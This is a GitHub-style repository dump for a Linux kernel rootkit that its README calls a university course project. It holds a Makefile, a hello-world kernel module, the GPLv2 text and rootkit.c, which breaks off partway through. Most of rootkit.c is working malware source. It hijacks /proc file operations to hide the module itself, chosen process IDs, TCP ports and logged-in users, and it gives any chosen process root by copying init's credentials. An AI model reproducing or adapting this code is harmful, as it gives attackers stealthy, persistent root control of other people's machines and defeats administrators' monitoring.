├── README.md ├── Makefile ├── .gitignore ├── hello-1.c ├── LICENSE └── rootkit.c /README.md: -------------------------------------------------------------------------------- 1 | Linux Rootkit 2 | ============= 3 | 4 | A rootkit for linux kernel >= 3.0. 5 | Created as project for CSEN 1010. 6 | -------------------------------------------------------------------------------- /Makefile: -------------------------------------------------------------------------------- 1 | obj-m += rootkit.o 2 | 3 | all: 4 | make -C /lib/modules/$(shell uname -r)/build M=$(PWD) modules 5 | 6 | clean: 7 | make -C /lib/modules/$(shell uname -r)/build M=$(PWD) clean -------------------------------------------------------------------------------- /.gitignore: -------------------------------------------------------------------------------- 1 | # Object files 2 | *.o 3 | *.ko 4 | *.obj 5 | *.elf 6 | 7 | # Libraries 8 | *.lib 9 | *.a 10 | 11 | # Shared objects (inc. Windows DLLs) 12 | *.dll 13 | *.so 14 | *.so.* 15 | *.dylib 16 | 17 | # Executables 18 | *.exe 19 | *.out 20 | *.app 21 | *.i*86 22 | *.x86_64 23 | *.hex 24 | -------------------------------------------------------------------------------- /hello-1.c: -------------------------------------------------------------------------------- 1 | // Simple test hello world 2 | // module 3 | #include // needed by all modules 4 | #include // needed for KERN_INFO 5 | #include // needed for __init and __exit macros 6 | 7 | MODULE_LICENSE("GPLv2"); 8 | static int __init hello_init(void) { 9 | printk(KERN_INFO "Hello World 1.\n"); 10 | // non 0 return means init_module failed and module can't be loaded. 11 | return 0; 12 | } 13 | 14 | static void __exit hello_exit(void) { 15 | printk(KERN_INFO "Goodbye World 1.\n"); 16 | } 17 | module_init(hello_init); 18 | module_exit(hello_exit); 19 | -------------------------------------------------------------------------------- /LICENSE: -------------------------------------------------------------------------------- 1 | GNU GENERAL PUBLIC LICENSE 2 | Version 2, June 1991 3 | 4 | Copyright (C) 1989, 1991 Free Software Foundation, Inc., 5 | 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA 6 | Everyone is permitted to copy and distribute verbatim copies 7 | of this license document, but changing it is not allowed. 8 | 9 | Preamble 10 | 11 | The licenses for most software are designed to take away your 12 | freedom to share and change it. By contrast, the GNU General Public 13 | License is intended to guarantee your freedom to share and change free 14 | software--to make sure the software is free for all its users. This 15 | General Public License applies to most of the Free Software 16 | Foundation's software and to any other program whose authors commit to 17 | using it. (Some other Free Software Foundation software is covered by 18 | the GNU Lesser General Public License instead.) You can apply it to 19 | your programs, too. 20 | 21 | When we speak of free software, we are referring to freedom, not 22 | price. Our General Public Licenses are designed to make sure that you 23 | have the freedom to distribute copies of free software (and charge for 24 | this service if you wish), that you receive source code or can get it 25 | if you want it, that you can change the software or use pieces of it 26 | in new free programs; and that you know you can do these things. 27 | 28 | To protect your rights, we need to make restrictions that forbid 29 | anyone to deny you these rights or to ask you to surrender the rights. 30 | These restrictions translate to certain responsibilities for you if you 31 | distribute copies of the software, or if you modify it. 32 | 33 | For example, if you distribute copies of such a program, whether 34 | gratis or for a fee, you must give the recipients all the rights that 35 | you have. You must make sure that they, too, receive or can get the 36 | source code. And you must show them these terms so they know their 37 | rights. 38 | 39 | We protect your rights with two steps: (1) copyright the software, and 40 | (2) offer you this license which gives you legal permission to copy, 41 | distribute and/or modify the software. 42 | 43 | Also, for each author's protection and ours, we want to make certain 44 | that everyone understands that there is no warranty for this free 45 | software. If the software is modified by someone else and passed on, we 46 | want its recipients to know that what they have is not the original, so 47 | that any problems introduced by others will not reflect on the original 48 | authors' reputations. 49 | 50 | Finally, any free program is threatened constantly by software 51 | patents. We wish to avoid the danger that redistributors of a free 52 | program will individually obtain patent licenses, in effect making the 53 | program proprietary. To prevent this, we have made it clear that any 54 | patent must be licensed for everyone's free use or not licensed at all. 55 | 56 | The precise terms and conditions for copying, distribution and 57 | modification follow. 58 | 59 | GNU GENERAL PUBLIC LICENSE 60 | TERMS AND CONDITIONS FOR COPYING, DISTRIBUTION AND MODIFICATION 61 | 62 | 0. This License applies to any program or other work which contains 63 | a notice placed by the copyright holder saying it may be distributed 64 | under the terms of this General Public License. The "Program", below, 65 | refers to any such program or work, and a "work based on the Program" 66 | means either the Program or any derivative work under copyright law: 67 | that is to say, a work containing the Program or a portion of it, 68 | either verbatim or with modifications and/or translated into another 69 | language. (Hereinafter, translation is included without limitation in 70 | the term "modification".) Each licensee is addressed as "you". 71 | 72 | Activities other than copying, distribution and modification are not 73 | covered by this License; they are outside its scope. The act of 74 | running the Program is not restricted, and the output from the Program 75 | is covered only if its contents constitute a work based on the 76 | Program (independent of having been made by running the Program). 77 | Whether that is true depends on what the Program does. 78 | 79 | 1. You may copy and distribute verbatim copies of the Program's 80 | source code as you receive it, in any medium, provided that you 81 | conspicuously and appropriately publish on each copy an appropriate 82 | copyright notice and disclaimer of warranty; keep intact all the 83 | notices that refer to this License and to the absence of any warranty; 84 | and give any other recipients of the Program a copy of this License 85 | along with the Program. 86 | 87 | You may charge a fee for the physical act of transferring a copy, and 88 | you may at your option offer warranty protection in exchange for a fee. 89 | 90 | 2. You may modify your copy or copies of the Program or any portion 91 | of it, thus forming a work based on the Program, and copy and 92 | distribute such modifications or work under the terms of Section 1 93 | above, provided that you also meet all of these conditions: 94 | 95 | a) You must cause the modified files to carry prominent notices 96 | stating that you changed the files and the date of any change. 97 | 98 | b) You must cause any work that you distribute or publish, that in 99 | whole or in part contains or is derived from the Program or any 100 | part thereof, to be licensed as a whole at no charge to all third 101 | parties under the terms of this License. 102 | 103 | c) If the modified program normally reads commands interactively 104 | when run, you must cause it, when started running for such 105 | interactive use in the most ordinary way, to print or display an 106 | announcement including an appropriate copyright notice and a 107 | notice that there is no warranty (or else, saying that you provide 108 | a warranty) and that users may redistribute the program under 109 | these conditions, and telling the user how to view a copy of this 110 | License. (Exception: if the Program itself is interactive but 111 | does not normally print such an announcement, your work based on 112 | the Program is not required to print an announcement.) 113 | 114 | These requirements apply to the modified work as a whole. If 115 | identifiable sections of that work are not derived from the Program, 116 | and can be reasonably considered independent and separate works in 117 | themselves, then this License, and its terms, do not apply to those 118 | sections when you distribute them as separate works. But when you 119 | distribute the same sections as part of a whole which is a work based 120 | on the Program, the distribution of the whole must be on the terms of 121 | this License, whose permissions for other licensees extend to the 122 | entire whole, and thus to each and every part regardless of who wrote it. 123 | 124 | Thus, it is not the intent of this section to claim rights or contest 125 | your rights to work written entirely by you; rather, the intent is to 126 | exercise the right to control the distribution of derivative or 127 | collective works based on the Program. 128 | 129 | In addition, mere aggregation of another work not based on the Program 130 | with the Program (or with a work based on the Program) on a volume of 131 | a storage or distribution medium does not bring the other work under 132 | the scope of this License. 133 | 134 | 3. You may copy and distribute the Program (or a work based on it, 135 | under Section 2) in object code or executable form under the terms of 136 | Sections 1 and 2 above provided that you also do one of the following: 137 | 138 | a) Accompany it with the complete corresponding machine-readable 139 | source code, which must be distributed under the terms of Sections 140 | 1 and 2 above on a medium customarily used for software interchange; or, 141 | 142 | b) Accompany it with a written offer, valid for at least three 143 | years, to give any third party, for a charge no more than your 144 | cost of physically performing source distribution, a complete 145 | machine-readable copy of the corresponding source code, to be 146 | distributed under the terms of Sections 1 and 2 above on a medium 147 | customarily used for software interchange; or, 148 | 149 | c) Accompany it with the information you received as to the offer 150 | to distribute corresponding source code. (This alternative is 151 | allowed only for noncommercial distribution and only if you 152 | received the program in object code or executable form with such 153 | an offer, in accord with Subsection b above.) 154 | 155 | The source code for a work means the preferred form of the work for 156 | making modifications to it. For an executable work, complete source 157 | code means all the source code for all modules it contains, plus any 158 | associated interface definition files, plus the scripts used to 159 | control compilation and installation of the executable. However, as a 160 | special exception, the source code distributed need not include 161 | anything that is normally distributed (in either source or binary 162 | form) with the major components (compiler, kernel, and so on) of the 163 | operating system on which the executable runs, unless that component 164 | itself accompanies the executable. 165 | 166 | If distribution of executable or object code is made by offering 167 | access to copy from a designated place, then offering equivalent 168 | access to copy the source code from the same place counts as 169 | distribution of the source code, even though third parties are not 170 | compelled to copy the source along with the object code. 171 | 172 | 4. You may not copy, modify, sublicense, or distribute the Program 173 | except as expressly provided under this License. Any attempt 174 | otherwise to copy, modify, sublicense or distribute the Program is 175 | void, and will automatically terminate your rights under this License. 176 | However, parties who have received copies, or rights, from you under 177 | this License will not have their licenses terminated so long as such 178 | parties remain in full compliance. 179 | 180 | 5. You are not required to accept this License, since you have not 181 | signed it. However, nothing else grants you permission to modify or 182 | distribute the Program or its derivative works. These actions are 183 | prohibited by law if you do not accept this License. Therefore, by 184 | modifying or distributing the Program (or any work based on the 185 | Program), you indicate your acceptance of this License to do so, and 186 | all its terms and conditions for copying, distributing or modifying 187 | the Program or works based on it. 188 | 189 | 6. Each time you redistribute the Program (or any work based on the 190 | Program), the recipient automatically receives a license from the 191 | original licensor to copy, distribute or modify the Program subject to 192 | these terms and conditions. You may not impose any further 193 | restrictions on the recipients' exercise of the rights granted herein. 194 | You are not responsible for enforcing compliance by third parties to 195 | this License. 196 | 197 | 7. If, as a consequence of a court judgment or allegation of patent 198 | infringement or for any other reason (not limited to patent issues), 199 | conditions are imposed on you (whether by court order, agreement or 200 | otherwise) that contradict the conditions of this License, they do not 201 | excuse you from the conditions of this License. If you cannot 202 | distribute so as to satisfy simultaneously your obligations under this 203 | License and any other pertinent obligations, then as a consequence you 204 | may not distribute the Program at all. For example, if a patent 205 | license would not permit royalty-free redistribution of the Program by 206 | all those who receive copies directly or indirectly through you, then 207 | the only way you could satisfy both it and this License would be to 208 | refrain entirely from distribution of the Program. 209 | 210 | If any portion of this section is held invalid or unenforceable under 211 | any particular circumstance, the balance of the section is intended to 212 | apply and the section as a whole is intended to apply in other 213 | circumstances. 214 | 215 | It is not the purpose of this section to induce you to infringe any 216 | patents or other property right claims or to contest validity of any 217 | such claims; this section has the sole purpose of protecting the 218 | integrity of the free software distribution system, which is 219 | implemented by public license practices. Many people have made 220 | generous contributions to the wide range of software distributed 221 | through that system in reliance on consistent application of that 222 | system; it is up to the author/donor to decide if he or she is willing 223 | to distribute software through any other system and a licensee cannot 224 | impose that choice. 225 | 226 | This section is intended to make thoroughly clear what is believed to 227 | be a consequence of the rest of this License. 228 | 229 | 8. If the distribution and/or use of the Program is restricted in 230 | certain countries either by patents or by copyrighted interfaces, the 231 | original copyright holder who places the Program under this License 232 | may add an explicit geographical distribution limitation excluding 233 | those countries, so that distribution is permitted only in or among 234 | countries not thus excluded. In such case, this License incorporates 235 | the limitation as if written in the body of this License. 236 | 237 | 9. The Free Software Foundation may publish revised and/or new versions 238 | of the General Public License from time to time. Such new versions will 239 | be similar in spirit to the present version, but may differ in detail to 240 | address new problems or concerns. 241 | 242 | Each version is given a distinguishing version number. If the Program 243 | specifies a version number of this License which applies to it and "any 244 | later version", you have the option of following the terms and conditions 245 | either of that version or of any later version published by the Free 246 | Software Foundation. If the Program does not specify a version number of 247 | this License, you may choose any version ever published by the Free Software 248 | Foundation. 249 | 250 | 10. If you wish to incorporate parts of the Program into other free 251 | programs whose distribution conditions are different, write to the author 252 | to ask for permission. For software which is copyrighted by the Free 253 | Software Foundation, write to the Free Software Foundation; we sometimes 254 | make exceptions for this. Our decision will be guided by the two goals 255 | of preserving the free status of all derivatives of our free software and 256 | of promoting the sharing and reuse of software generally. 257 | 258 | NO WARRANTY 259 | 260 | 11. BECAUSE THE PROGRAM IS LICENSED FREE OF CHARGE, THERE IS NO WARRANTY 261 | FOR THE PROGRAM, TO THE EXTENT PERMITTED BY APPLICABLE LAW. EXCEPT WHEN 262 | OTHERWISE STATED IN WRITING THE COPYRIGHT HOLDERS AND/OR OTHER PARTIES 263 | PROVIDE THE PROGRAM "AS IS" WITHOUT WARRANTY OF ANY KIND, EITHER EXPRESSED 264 | OR IMPLIED, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF 265 | MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE. THE ENTIRE RISK AS 266 | TO THE QUALITY AND PERFORMANCE OF THE PROGRAM IS WITH YOU. SHOULD THE 267 | PROGRAM PROVE DEFECTIVE, YOU ASSUME THE COST OF ALL NECESSARY SERVICING, 268 | REPAIR OR CORRECTION. 269 | 270 | 12. IN NO EVENT UNLESS REQUIRED BY APPLICABLE LAW OR AGREED TO IN WRITING 271 | WILL ANY COPYRIGHT HOLDER, OR ANY OTHER PARTY WHO MAY MODIFY AND/OR 272 | REDISTRIBUTE THE PROGRAM AS PERMITTED ABOVE, BE LIABLE TO YOU FOR DAMAGES, 273 | INCLUDING ANY GENERAL, SPECIAL, INCIDENTAL OR CONSEQUENTIAL DAMAGES ARISING 274 | OUT OF THE USE OR INABILITY TO USE THE PROGRAM (INCLUDING BUT NOT LIMITED 275 | TO LOSS OF DATA OR DATA BEING RENDERED INACCURATE OR LOSSES SUSTAINED BY 276 | YOU OR THIRD PARTIES OR A FAILURE OF THE PROGRAM TO OPERATE WITH ANY OTHER 277 | PROGRAMS), EVEN IF SUCH HOLDER OR OTHER PARTY HAS BEEN ADVISED OF THE 278 | POSSIBILITY OF SUCH DAMAGES. 279 | 280 | END OF TERMS AND CONDITIONS 281 | 282 | How to Apply These Terms to Your New Programs 283 | 284 | If you develop a new program, and you want it to be of the greatest 285 | possible use to the public, the best way to achieve this is to make it 286 | free software which everyone can redistribute and change under these terms. 287 | 288 | To do so, attach the following notices to the program. It is safest 289 | to attach them to the start of each source file to most effectively 290 | convey the exclusion of warranty; and each file should have at least 291 | the "copyright" line and a pointer to where the full notice is found. 292 | 293 | {description} 294 | Copyright (C) {year} {fullname} 295 | 296 | This program is free software; you can redistribute it and/or modify 297 | it under the terms of the GNU General Public License as published by 298 | the Free Software Foundation; either version 2 of the License, or 299 | (at your option) any later version. 300 | 301 | This program is distributed in the hope that it will be useful, 302 | but WITHOUT ANY WARRANTY; without even the implied warranty of 303 | MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the 304 | GNU General Public License for more details. 305 | 306 | You should have received a copy of the GNU General Public License along 307 | with this program; if not, write to the Free Software Foundation, Inc., 308 | 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA. 309 | 310 | Also add information on how to contact you by electronic and paper mail. 311 | 312 | If the program is interactive, make it output a short notice like this 313 | when it starts in an interactive mode: 314 | 315 | Gnomovision version 69, Copyright (C) year name of author 316 | Gnomovision comes with ABSOLUTELY NO WARRANTY; for details type `show w'. 317 | This is free software, and you are welcome to redistribute it 318 | under certain conditions; type `show c' for details. 319 | 320 | The hypothetical commands `show w' and `show c' should show the appropriate 321 | parts of the General Public License. Of course, the commands you use may 322 | be called something other than `show w' and `show c'; they could even be 323 | mouse-clicks or menu items--whatever suits your program. 324 | 325 | You should also get your employer (if you work as a programmer) or your 326 | school, if any, to sign a "copyright disclaimer" for the program, if 327 | necessary. Here is a sample; alter the names: 328 | 329 | Yoyodyne, Inc., hereby disclaims all copyright interest in the program 330 | `Gnomovision' (which makes passes at compilers) written by James Hacker. 331 | 332 | {signature of Ty Coon}, 1 April 1989 333 | Ty Coon, President of Vice 334 | 335 | This General Public License does not permit incorporating your program into 336 | proprietary programs. If your program is a subroutine library, you may 337 | consider it more useful to permit linking proprietary applications with the 338 | library. If this is what you want to do, use the GNU Lesser General 339 | Public License instead of this License. -------------------------------------------------------------------------------- /rootkit.c: -------------------------------------------------------------------------------- 1 | // This program is free software; you can redistribute it and/or modify 2 | // it under the terms of the GNU General Public License as published by 3 | // the Free Software Foundation; either version 3 of the License, or 4 | // (at your option) any later version. 5 | // 6 | // This program is distributed in the hope that it will be useful, 7 | // but WITHOUT ANY WARRANTY; without even the implied warranty of 8 | // MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the 9 | // GNU General Public License for more details. 10 | // 11 | // You should have received a copy of the GNU General Public License 12 | // along with this program; if not, write to the Free Software 13 | // Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, 14 | // MA 02110-1301, USA. 15 | // 16 | // Author: Matías Fontanini 17 | // Contact: matias.fontanini@gmail.com 18 | // 19 | // Thanks to Dhiru Kholia(https://github.com/kholia) for porting 20 | // this rootkit to Linux >= 3.0. 21 | 22 | 23 | // We simple ported it to kernel 3.14 24 | // Most of the functionality is working 25 | // Ahmed, Hisham, Marwan , Ahmed, Mina Misak and Lobna Farag 26 | #include 27 | #include 28 | #include 29 | #include 30 | #include 31 | #include 32 | #include 33 | MODULE_AUTHOR("Matías Fontanini"); 34 | MODULE_AUTHOR("Dhiru Kholia"); 35 | MODULE_AUTHOR("Ahmed H. Ismail"); 36 | MODULE_AUTHOR("Marwan Derwey"); 37 | MODULE_AUTHOR("Hisham"); 38 | MODULE_AUTHOR("Ahmed"); 39 | MODULE_AUTHOR("Mina Misak"); 40 | MODULE_AUTHOR("Lobna Farag"); 41 | MODULE_DESCRIPTION("Port of the https://github.com/mfontanini/Programs-Scripts/blob/master/rootkit/rootkit.c rootkit to kernel 3.14"); 42 | 43 | // THEY HID THIS STRUCT IN THE INTERNAL HEADERS ! 44 | // THOSE BASTARDOS ! 45 | struct proc_dir_entry { 46 | unsigned int low_ino; 47 | umode_t mode; 48 | nlink_t nlink; 49 | kuid_t uid; 50 | kgid_t gid; 51 | loff_t size; 52 | const struct inode_operations *proc_iops; 53 | const struct file_operations *proc_fops; 54 | struct proc_dir_entry *next, *parent, *subdir; 55 | void *data; 56 | atomic_t count; /* use count */ 57 | atomic_t in_use; /* number of callers into module in progress; */ 58 | /* negative -> it's going away RSN */ 59 | struct completion *pde_unload_completion; 60 | struct list_head pde_openers; /* who did ->open, but not ->release */ 61 | spinlock_t pde_unload_lock; /* proc_fops checks and pde_users bumps */ 62 | u8 namelen; 63 | char name[]; 64 | }; 65 | 66 | 67 | 68 | #define MODULE_NAME "rootkit" 69 | #define MAX_COMMAND_SZ 30 70 | #define MAX_HIDDEN_PIDS 80 71 | #define MAX_PID_LENGTH 6 72 | #define MAX_HIDDEN_PORTS 20 73 | #define MAX_PORT_LENGTH 5 74 | #define MAX_HIDDEN_USERS 10 75 | /* Commands */ 76 | 77 | #define MAKE_ROOT_CMD "root" 78 | #define HIDE_MOD_CMD "hide" 79 | #define SHOW_MOD_CMD "show" 80 | #define HIDE_PID_CMD "hpid" 81 | #define SHOW_PID_CMD "spid" 82 | #define HIDE_DPORT_CMD "hdport" 83 | #define HIDE_SPORT_CMD "hsport" 84 | #define SHOW_DPORT_CMD "sdport" 85 | #define SHOW_SPORT_CMD "ssport" 86 | #define HIDE_USER_CMD "huser" 87 | #define SHOW_USER_CMD "suser" 88 | 89 | 90 | 91 | 92 | #define USER_PROCESS 7 93 | #define UT_LINESIZE 32 94 | #define UT_NAMESIZE 32 95 | #define UT_HOSTSIZE 256 96 | 97 | struct exit_status { 98 | short int e_termination; /* process termination status */ 99 | short int e_exit; /* process exit status */ 100 | }; 101 | 102 | struct utmp { 103 | short ut_type; /* type of login */ 104 | pid_t ut_pid; /* PID of login process */ 105 | char ut_line[UT_LINESIZE]; /* device name of tty - "/dev/" */ 106 | char ut_id[4]; /* init id or abbrev. ttyname */ 107 | char ut_user[UT_NAMESIZE]; /* user name */ 108 | char ut_host[UT_HOSTSIZE]; /* hostname for remote login */ 109 | struct exit_status ut_exit; /* The exit status of a process 110 | marked as DEAD_PROCESS */ 111 | int32_t ut_session; /* Session ID, used for windowing */ 112 | struct { 113 | int32_t tv_sec; /* Seconds */ 114 | int32_t tv_usec; /* Microseconds */ 115 | } ut_tv; /* Time entry was made */ 116 | 117 | int32_t ut_addr_v6[4]; /* IP address of remote host */ 118 | char __unused[20]; /* Reserved for future use */ 119 | }; 120 | 121 | /* Injection structs */ 122 | struct inode *pinode, *tinode, *uinode, *rcinode, *modinode; 123 | struct proc_dir_entry *modules, *root, *handler, *tcp; 124 | static struct file_operations modules_fops, proc_fops, handler_fops, tcp_fops, user_fops, rc_fops, mod_fops; 125 | const struct file_operations *proc_original = 0, *modules_proc_original = 0, *handler_original = 0, *tcp_proc_original = 0, *user_proc_original = 0, *rc_proc_original = 0, *mod_proc_original; 126 | struct dir_context * proc_filldir, *rc_filldir, *mod_filldir; 127 | char *rc_name, *rc_dir, *mod_name, *mod_dir; 128 | module_param(rc_name , charp, 0); 129 | module_param(rc_dir , charp, 0); 130 | module_param(mod_name, charp, 0); 131 | module_param(mod_dir, charp, 0); 132 | 133 | 134 | typedef void (*pid_function_t)(unsigned); 135 | typedef void (*hide_port_function_t)(unsigned short); 136 | typedef void (*user_function_t)(char *); 137 | 138 | 139 | char hidden_pids[MAX_HIDDEN_PIDS][MAX_PID_LENGTH]; 140 | char hidden_dports[MAX_HIDDEN_PORTS][MAX_PORT_LENGTH], hidden_sports[MAX_HIDDEN_PORTS][MAX_PORT_LENGTH]; 141 | char hidden_users[MAX_HIDDEN_USERS][UT_NAMESIZE]; 142 | unsigned hidden_pid_count = 0, hidden_dport_count = 0, hidden_sport_count = 0, hidden_user_count = 0; 143 | 144 | 145 | 146 | 147 | int port_in_array(char arr[MAX_HIDDEN_PORTS][MAX_PORT_LENGTH], unsigned sz, char *val) { 148 | unsigned i; 149 | for(i = 0; i < sz; ++i) 150 | if(!strcmp(arr[i], val)) 151 | return 1; 152 | return 0; 153 | } 154 | 155 | int pid_in_array(char arr[MAX_HIDDEN_PIDS][MAX_PID_LENGTH], unsigned sz, char *val) { 156 | unsigned i; 157 | for(i = 0; i < sz; ++i) 158 | if(!strcmp(arr[i], val)) 159 | return 1; 160 | return 0; 161 | } 162 | 163 | int user_in_array(char arr[MAX_HIDDEN_USERS][UT_NAMESIZE], unsigned sz, char *val) { 164 | unsigned i; 165 | for(i = 0; i < sz; ++i) 166 | if(!strcmp(arr[i], val)) 167 | return 1; 168 | return 0; 169 | } 170 | 171 | void hide_module(void) { 172 | modules->proc_fops = &modules_fops; 173 | } 174 | 175 | void show_module(void) { 176 | modules->proc_fops = modules_proc_original; 177 | } 178 | 179 | inline char to_upper(char c) { 180 | return (c >= 'a' && c <= 'f') ? c - 32 : c; 181 | } 182 | 183 | // returns the task_struct associated with pid 184 | struct task_struct *get_task_struct_by_pid(unsigned pid) { 185 | struct pid *proc_pid = find_vpid(pid); 186 | struct task_struct *task; 187 | if(!proc_pid) 188 | return 0; 189 | task = pid_task(proc_pid, PIDTYPE_PID); 190 | return task; 191 | } 192 | 193 | void zero_fill_port(char *port) { 194 | int end=0, i, j; 195 | while(port[end]) 196 | end++; 197 | i = MAX_PORT_LENGTH-1; 198 | j = end; 199 | while(j >= 0) 200 | port[i--] = port[j--]; 201 | for(i = 0; i < MAX_PORT_LENGTH - 1 - end; i++) 202 | port[i] = '0'; 203 | } 204 | 205 | // makes the process pid belong to uid 0 206 | void make_root(unsigned pid) { 207 | struct task_struct *task = get_task_struct_by_pid(pid); 208 | struct task_struct *init_task = get_task_struct_by_pid(1); 209 | if(!task || !init_task) 210 | return; 211 | task->cred = init_task->cred; 212 | } 213 | #if LINUX_VERSION_CODE < KERNEL_VERSION(2, 6, 33) 214 | #ifndef CENTOS 215 | char * strnstr(char *s, const char *find, size_t slen) { 216 | char c, sc; 217 | size_t len; 218 | if ((c = *find++) != '\0') { 219 | len = strlen(find); 220 | do { 221 | do { 222 | if (slen-- < 1 || (sc = *s++) == '\0') 223 | return 0; 224 | } while (sc != c); 225 | if (len > slen) 226 | return 0; 227 | } while (strncmp(s, find, len) != 0); 228 | s--; 229 | } 230 | return ((char *)s); 231 | } 232 | #endif 233 | #endif 234 | 235 | 236 | static ssize_t do_read_modules (struct file *fp, char __user *buf, size_t sz, loff_t *loff) { 237 | ssize_t read; 238 | char *ss; 239 | read = modules_proc_original->read(fp, buf, sz, loff); 240 | // where's my module name? 241 | ss = strnstr(buf, MODULE_NAME, strlen(MODULE_NAME)); 242 | if(ss) { 243 | // stealth please 244 | char *new_line = strchr(ss, '\n'); 245 | memcpy(ss, new_line + 1, read - (new_line - ss)); 246 | return read - (new_line - ss + 1); 247 | } 248 | return read; 249 | } 250 | 251 | static ssize_t do_read_tcp (struct file *fp, char __user *buf, size_t sz, loff_t *loff) { 252 | ssize_t read; 253 | char *ss, *lstart, *new_line; 254 | unsigned i = 0, j, found; 255 | read = tcp_proc_original->read(fp, buf, sz, loff); 256 | while(i < read) { 257 | found = 0; 258 | lstart = &buf[i]; 259 | new_line = strchr(lstart, '\n'); //pointer to new line. 260 | ss = strchr(strchr(lstart, ':') + 1, ':') + 1; // pointer to first char after second colon 261 | // ss Should be the local port 262 | // local_address 263 | for(j = 0; j < hidden_sport_count; ++j) { 264 | if(!strncmp(hidden_sports[j], ss, 4)) { 265 | memcpy(lstart, new_line + 1, read - (new_line - lstart)); 266 | read -= (new_line - lstart + 1); 267 | found = 1; 268 | j = hidden_sport_count; 269 | } 270 | } 271 | if(!found) { 272 | ss = strchr(ss, ':') + 1; 273 | // rem_address 274 | for(j = 0; j < hidden_dport_count; ++j) { 275 | if(!strncmp(hidden_dports[j], ss, 4)) { 276 | memcpy(lstart, new_line + 1, read - (new_line - lstart)); 277 | read -= (new_line - lstart + 1); 278 | j = hidden_dport_count; 279 | found = 1; 280 | } 281 | } 282 | } 283 | if(!found) 284 | i += new_line - lstart + 1; 285 | } 286 | return read; 287 | } 288 | 289 | static ssize_t do_read_users(struct file *fp, char __user *buf, size_t sz, loff_t *loff) { 290 | ssize_t read = user_proc_original->read(fp, buf, sz, loff); 291 | struct utmp *data; 292 | unsigned i = 0, w, found; 293 | while(i < read) { 294 | found = 0; 295 | data = (struct utmp *)&buf[i]; 296 | for(w = 0; w < hidden_user_count && !found; ++w) { 297 | if(data->ut_type == USER_PROCESS && !strncmp(data->ut_user, hidden_users[w], 6)) { 298 | unsigned j; 299 | for(j = 0; j < read - i; ++j) { 300 | buf[i+j] = buf[i+j+sizeof(struct utmp)]; 301 | } 302 | read -= sizeof(struct utmp); 303 | if(!read) 304 | read = user_proc_original->read(fp, &buf[0], sz - i, loff); 305 | found = 1; 306 | } 307 | } 308 | if(!found) 309 | i += sizeof(struct utmp); 310 | } 311 | return read; 312 | } 313 | 314 | void hide_user(char *user) { 315 | if(hidden_user_count < MAX_HIDDEN_USERS && !user_in_array(hidden_users, hidden_user_count, user)) { 316 | strcpy(hidden_users[hidden_user_count++], user); 317 | } 318 | } 319 | 320 | void unhide_user(char *user) { 321 | unsigned i = 0; 322 | for(; i < hidden_user_count; ++i) { 323 | if(!strcmp(user, hidden_users[i])) { 324 | while(i < hidden_user_count-1) { 325 | strcpy(hidden_users[i], hidden_users[i+1]); 326 | i++; 327 | } 328 | hidden_user_count--; 329 | return; 330 | } 331 | } 332 | } 333 | 334 | void hide_pid(unsigned pid) { 335 | if(hidden_pid_count < MAX_HIDDEN_PIDS && get_task_struct_by_pid(pid)) { 336 | snprintf(hidden_pids[hidden_pid_count], MAX_PID_LENGTH, "%d", pid); 337 | if(!pid_in_array(hidden_pids, hidden_pid_count, hidden_pids[hidden_pid_count])) 338 | hidden_pid_count++; 339 | } 340 | } 341 | 342 | void unhide_pid(unsigned pid) { 343 | char buffer[MAX_PID_LENGTH]; 344 | unsigned i; 345 | snprintf(buffer, MAX_PID_LENGTH, "%d", pid); 346 | // let's find that fuck'n pid 347 | for(i = 0; i < hidden_pid_count; ++i) { 348 | if(!strcmp(buffer, hidden_pids[i])) { 349 | // overwrite it 350 | while(i < hidden_pid_count-1) { 351 | strcpy(hidden_pids[i], hidden_pids[i+1]); 352 | i++; 353 | } 354 | hidden_pid_count--; 355 | return; 356 | } 357 | } 358 | } 359 | 360 | void generic_pid_function(pid_function_t func, const char __user *data, size_t sz) { 361 | unsigned i = strlen(HIDE_PID_CMD) + 1; 362 | char *dummy; 363 | if(i < sz) { 364 | unsigned pid = simple_strtol(&data[i], &dummy, 10); 365 | if(pid) 366 | func(pid); 367 | } 368 | } 369 | 370 | void generic_user_function(user_function_t func, const char __user *data, size_t sz) { 371 | unsigned i = strlen(HIDE_PID_CMD) + 2; 372 | if(i < sz) { 373 | char buffer[UT_NAMESIZE+1]; 374 | unsigned to_read = min(sz - i, (size_t)UT_NAMESIZE); 375 | memcpy(buffer, &data[i], to_read); 376 | buffer[to_read - 1] = 0; 377 | func(buffer); 378 | } 379 | } 380 | 381 | void unhide_port(unsigned port, char port_array[MAX_HIDDEN_PIDS][MAX_PORT_LENGTH], unsigned *count) { 382 | char buffer[MAX_PORT_LENGTH]; 383 | unsigned i; 384 | snprintf(buffer, MAX_PORT_LENGTH, "%x", port); 385 | for(i = 0; buffer[i]; ++i) 386 | buffer[i] = to_upper(buffer[i]); 387 | zero_fill_port(buffer); 388 | // let's find that fuck'n pid 389 | for(i = 0; i < *count; ++i) { 390 | if(!strcmp(buffer, port_array[i])) { 391 | // overwrite it 392 | while(i < *count - 1) { 393 | strcpy(port_array[i], port_array[i+1]); 394 | i++; 395 | } 396 | (*count)--; 397 | return; 398 | } 399 | } 400 | } 401 | 402 | void hide_dport(unsigned short port) { 403 | if(hidden_dport_count < MAX_HIDDEN_PORTS) { 404 | unsigned i; 405 | snprintf(hidden_dports[hidden_dport_count], MAX_PORT_LENGTH, "%x", port); 406 | for(i = 0; hidden_dports[hidden_dport_count][i]; ++i) 407 | hidden_dports[hidden_dport_count][i] = to_upper(hidden_dports[hidden_dport_count][i]); 408 | zero_fill_port(hidden_dports[hidden_dport_count]); 409 | printk("dport: %s\n", hidden_dports[hidden_dport_count]); 410 | if(!port_in_array(hidden_dports, hidden_dport_count, hidden_dports[hidden_dport_count])) 411 | hidden_dport_count++; 412 | } 413 | } 414 | 415 | void hide_sport(unsigned short port) { 416 | if(hidden_sport_count < MAX_HIDDEN_PORTS) { 417 | unsigned i; 418 | snprintf(hidden_sports[hidden_sport_count], MAX_PORT_LENGTH, "%x", port); 419 | for(i = 0; hidden_sports[hidden_sport_count][i]; ++i) 420 | hidden_sports[hidden_sport_count][i] = to_upper(hidden_sports[hidden_sport_count][i]); 421 | 